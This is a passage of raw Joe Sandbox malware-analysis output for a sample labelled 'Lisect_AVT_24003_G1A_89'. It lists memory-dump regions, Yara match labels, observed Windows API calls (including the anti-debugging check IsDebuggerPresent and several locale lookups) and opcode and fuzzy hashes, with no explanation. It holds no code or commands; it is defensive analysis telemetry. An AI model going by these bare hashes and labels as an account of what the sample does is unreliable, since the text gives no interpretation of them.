                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale$ErrorLast
                                  • String ID:
                                  • API String ID: 661929714-0
                                  • Opcode ID: 4ef1a40aa4b1304e88e9e2d865e032d1927a8e3fa1a607bd0b0166c075879653
                                  • Instruction ID: 7a7b63cd897a12ffdfb9ead8c3400a8356f6fbab48e97994d9cc2244d089e5b2
                                  • Opcode Fuzzy Hash: 4ef1a40aa4b1304e88e9e2d865e032d1927a8e3fa1a607bd0b0166c075879653
                                  • Instruction Fuzzy Hash: 3561C3B151020B9FEB69AFE8CD81BBA77F8EF14300F9041B9E985C6985E774D980CB50
                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 0109210C
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01092116
                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 01092123
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                  • String ID:
                                  • API String ID: 3906539128-0
                                  • Opcode ID: cf12d551bd5e97db83732af10f61ce2d6e5024a0fb07e03d43b02fe71205076b
                                  • Instruction ID: 06a2a469cb6f964dfff1dcb2b7b1e84b86c34e3cb45af565cdfba9f767517c02
                                  • Opcode Fuzzy Hash: cf12d551bd5e97db83732af10f61ce2d6e5024a0fb07e03d43b02fe71205076b
                                  • Instruction Fuzzy Hash: 7731D47490121DABCB21EF68D9887DCBBB8BF18310F5042DAE55CA72A0E7749B818F44
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4461588188.000000007ECA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ECA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7eca0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8FH9$ePS^
                                  • API String ID: 0-2177040980
                                  • Opcode ID: feb7b235874c29357912c28811fb845d837b5554871f4c54ac87b5b76058b65e
                                  • Instruction ID: d65ce1ba04b66dad8eb1a5bd2ab63ebcb8b65dce4f49e96ed3b8151cfbba7a08
                                  • Opcode Fuzzy Hash: feb7b235874c29357912c28811fb845d837b5554871f4c54ac87b5b76058b65e
                                  • Instruction Fuzzy Hash: 274299F7E003012BF3058A29DCC2A9B769BEBC4368F29853CEA4D677C5E1B59D118791
                                  APIs
                                  • GetSystemTimePreciseAsFileTime.KERNEL32(?,0108C6EA,?,?,?,?,00FC4A9B,?,00FCF03C), ref: 0108CCF5
                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,0108C6EA,?,?,?,?,00FC4A9B,?,00FCF03C), ref: 0108CCF9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$FileSystem$Precise
                                  • String ID:
                                  • API String ID: 743729956-0
                                  • Opcode ID: a3b8c042f88e5f5dd22d16cc379320846976ede39f03e8523c5a0004c3fd8ab8
                                  • Instruction ID: 365ff3a5a54d247cbbdcc6c0a54a004740513a28f46689c70673702f5fbe52ce
                                  • Opcode Fuzzy Hash: a3b8c042f88e5f5dd22d16cc379320846976ede39f03e8523c5a0004c3fd8ab8
                                  • Instruction Fuzzy Hash: 9ED0A93250902CA7AB212BA9B9044DC7BA9EA08A10308801AFAC567104CAA619004BE0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4461588188.000000007ECA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ECA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7eca0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8FH9$G<\y
                                  • API String ID: 0-3903323649
                                  • Opcode ID: 46c4aa28b2b6e9893cf615e23a384afeb98959246bed738772adf2a5737d87a3
                                  • Instruction ID: 7ee1c94c6a6b694d49a51c6916c795af29a08825efe5bc334390616c5d36d2b5
                                  • Opcode Fuzzy Hash: 46c4aa28b2b6e9893cf615e23a384afeb98959246bed738772adf2a5737d87a3
                                  • Instruction Fuzzy Hash: B19188BBE017151BF3048A68EC96657769BABC4368F6B863CDE0E633C5D5B89D1043C2
                                  APIs
                                  • IsDebuggerPresent.KERNEL32(?,?,?,00000001,00000000), ref: 00FC4C63
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DebuggerPresent
                                  • String ID:
                                  • API String ID: 1347740429-0
                                  • Opcode ID: f5d099542c914362ff3cac1c12f7aa4eb85546ff5bdc0f48b250229156567b33
                                  • Instruction ID: 76b0b386c3b07f62285402b14c4a1c53ac9c888f680f818ae71270607039a1a6
                                  • Opcode Fuzzy Hash: f5d099542c914362ff3cac1c12f7aa4eb85546ff5bdc0f48b250229156567b33
                                  • Instruction Fuzzy Hash: 6F51A171D0020A9FCB18DF68C951BEEBBB4EF88710F108259E855B7350D774AE448BA4
                                  APIs
                                    • Part of subcall function 010A364B: GetLastError.KERNEL32(?,?,0109DD18,?,?,00000003,01092013,?,01091F82,?,00000016,01092191), ref: 010A364F
                                    • Part of subcall function 010A364B: SetLastError.KERNEL32(00000000,00000016,01092191,?,?,?,?,?,00000000,?,?,?,?,?,?,00FB2D8D), ref: 010A36F1
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 010ADDEF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$InfoLocale
                                  • String ID:
                                  • API String ID: 3736152602-0
                                  • Opcode ID: 21af563b6dfa7ac5bdf72088d35f953a9af85aaf1cff09757fa4f3dbb8331ef6
                                  • Instruction ID: cf27d51caee8017b3158f53fabf5a99c640c444b263284c9d74ab206cc4c0fda
                                  • Opcode Fuzzy Hash: 21af563b6dfa7ac5bdf72088d35f953a9af85aaf1cff09757fa4f3dbb8331ef6
                                  • Instruction Fuzzy Hash: 6521C272600206ABDB28EFE8DD41ABB37E8EF64754B4040BAEA85C7541EB35E940C750
                                  APIs
                                    • Part of subcall function 010A364B: GetLastError.KERNEL32(?,?,0109DD18,?,?,00000003,01092013,?,01091F82,?,00000016,01092191), ref: 010A364F
                                    • Part of subcall function 010A364B: SetLastError.KERNEL32(00000000,00000016,01092191,?,?,?,?,?,00000000,?,?,?,?,?,?,00FB2D8D), ref: 010A36F1
                                  • EnumSystemLocalesW.KERNEL32(010ADB48,00000001,00000000,?,?,?,010AE17C,?), ref: 010ADA94
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • String ID:
                                  • API String ID: 2417226690-0
                                  • Opcode ID: 9e4445c000a112260a239de3497b938114a4d59ee4aaa6f789b8d567eccc647e
                                  • Instruction ID: bbb3233fd6a69a3394cd45c0a4374feb9e396e43af579c8c08720d2c96381a66
                                  • Opcode Fuzzy Hash: 9e4445c000a112260a239de3497b938114a4d59ee4aaa6f789b8d567eccc647e
                                  • Instruction Fuzzy Hash: 8F11293B2047019FDB189FB9C8A05BAB791FF84319B54442CE9C74BB40D3716542C740
                                  APIs
                                    • Part of subcall function 010A364B: GetLastError.KERNEL32(?,?,0109DD18,?,?,00000003,01092013,?,01091F82,?,00000016,01092191), ref: 010A364F
                                    • Part of subcall function 010A364B: SetLastError.KERNEL32(00000000,00000016,01092191,?,?,?,?,?,00000000,?,?,?,?,?,?,00FB2D8D), ref: 010A36F1
                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,010ADD64,00000000,00000000,?), ref: 010ADFF6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$InfoLocale
                                  • String ID:
                                  • API String ID: 3736152602-0
                                  • Opcode ID: 7bb20ca48ebed42ba3c9504b541af6599806600d5586f295179f0ff96be4a3b7
                                  • Instruction ID: ab66cd9dc5d1667ac6d45ddd92c28f3bdf19579d429fbc33ae0cfda807b4ce7e
                                  • Opcode Fuzzy Hash: 7bb20ca48ebed42ba3c9504b541af6599806600d5586f295179f0ff96be4a3b7
                                  • Instruction Fuzzy Hash: CC014E32640113ABDF285BA8CC45EFB3794DB40254F444569FDC2AB180DA30FDC1C690
                                  APIs
                                    • Part of subcall function 010A364B: GetLastError.KERNEL32(?,?,0109DD18,?,?,00000003,01092013,?,01091F82,?,00000016,01092191), ref: 010A364F
                                    • Part of subcall function 010A364B: SetLastError.KERNEL32(00000000,00000016,01092191,?,?,?,?,?,00000000,?,?,?,?,?,?,00FB2D8D), ref: 010A36F1
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 010AD984
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$InfoLocale
                                  • String ID: utf8
                                  • API String ID: 3736152602-905460609
                                  • Opcode ID: 39907b3b6547abf9912c6a003c965c54b817e289e220470d430a39b25938ff02
                                  • Instruction ID: a2bc05e12d601ce83e54e3609c4a0883d667f3f565154f1a49a2df4527a7bba3
                                  • Opcode Fuzzy Hash: 39907b3b6547abf9912c6a003c965c54b817e289e220470d430a39b25938ff02
                                  • Instruction Fuzzy Hash: 51F02232A00206ABC714AFF8D945EFE33ECEB58711F40417AA686DB280EA38AD048750
                                  APIs
                                    • Part of subcall function 010A364B: GetLastError.KERNEL32(?,?,0109DD18,?,?,00000003,01092013,?,01091F82,?,00000016,01092191), ref: 010A364F
                                    • Part of subcall function 010A364B: SetLastError.KERNEL32(00000000,00000016,01092191,?,?,?,?,?,00000000,?,?,?,?,?,?,00FB2D8D), ref: 010A36F1
                                  • EnumSystemLocalesW.KERNEL32(010ADD9B,00000001,?,?,?,?,010AE144,?,?,?,?), ref: 010ADB07
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • String ID:
                                  • API String ID: 2417226690-0
                                  • Opcode ID: 37e8c9df3a0b21c219afe274be1ce085af1912930bf3a921efd8211fc53cd285
                                  • Instruction ID: 80363c09adccba1759d7926ebbb35b06cd8085152282daf3161fdc5623f3dba5
                                  • Opcode Fuzzy Hash: 37e8c9df3a0b21c219afe274be1ce085af1912930bf3a921efd8211fc53cd285
                                  • Instruction Fuzzy Hash: 1EF022323003045FDB245FB98890AAA7BA5EB81668B45446CFA824BA80C6B29802C700
                                  APIs
                                    • Part of subcall function 0109D777: RtlEnterCriticalSection.NTDLL(?), ref: 0109D786
                                  • EnumSystemLocalesW.KERNEL32(010A49AD,00000001,010E1268,0000000C,010A4DE2,?,?,?,?), ref: 010A49F2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                  • String ID:
                                  • API String ID: 1272433827-0
                                  • Opcode ID: f8697f323c0a2ec52c10f1ec83aad8a0c570721b7e40a95bb77ad4bac3039081
                                  • Instruction ID: e2abd3d5bb4f90e1478a2a63bd9e63b53050f61a47ce5b5e3a1029e125944166
                                  • Opcode Fuzzy Hash: f8697f323c0a2ec52c10f1ec83aad8a0c570721b7e40a95bb77ad4bac3039081
                                  • Instruction Fuzzy Hash: F5F0AF7AA04204EFD710EF99E845B9C7BF0FB08B21F00451AF490DB2A0C7BA4901CF40
                                  APIs
                                    • Part of subcall function 010A364B: GetLastError.KERNEL32(?,?,0109DD18,?,?,00000003,01092013,?,01091F82,?,00000016,01092191), ref: 010A364F
                                    • Part of subcall function 010A364B: SetLastError.KERNEL32(00000000,00000016,01092191,?,?,?,?,?,00000000,?,?,?,?,?,?,00FB2D8D), ref: 010A36F1
                                  • EnumSystemLocalesW.KERNEL32(010AD930,00000001,?,?,?,010AE19E,?,?,?,?), ref: 010ADA0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • String ID:
                                  • API String ID: 2417226690-0
                                  • Opcode ID: 1a49d4f6f613e0ff66413c35a85f9db9e927cd02fa2b83e88920e215ff847b2f
                                  • Instruction ID: 3f278aa1e13f2555bec665191cce2dad4abf9aa503c81792750f090e28512d67
                                  • Opcode Fuzzy Hash: 1a49d4f6f613e0ff66413c35a85f9db9e927cd02fa2b83e88920e215ff847b2f
                                  • Instruction Fuzzy Hash: CDF0553A30020557CB159FB9C8456AABF94EFC2A10B8A409CFA898F640C632D843C790
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,?,?,?,?,010A15F9,?,20001004,?,00000002,?,?,010A0BEB), ref: 010A4F71
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: 143e135ddaa7ddcd189291866252326825127a29d0f4d3e03d2dae03fa2f76b6
                                  • Instruction ID: cf842314583886df869d69555cb4b06227b2a89310d91b5b99cd547d88ed6bad
                                  • Opcode Fuzzy Hash: 143e135ddaa7ddcd189291866252326825127a29d0f4d3e03d2dae03fa2f76b6
                                  • Instruction Fuzzy Hash: 07E08639500118BBDF226FA0EC08EEE7F59FF54760F484011FD85A6161CB7699219BD4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmp, Offset: 01112000, based on PE: true
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
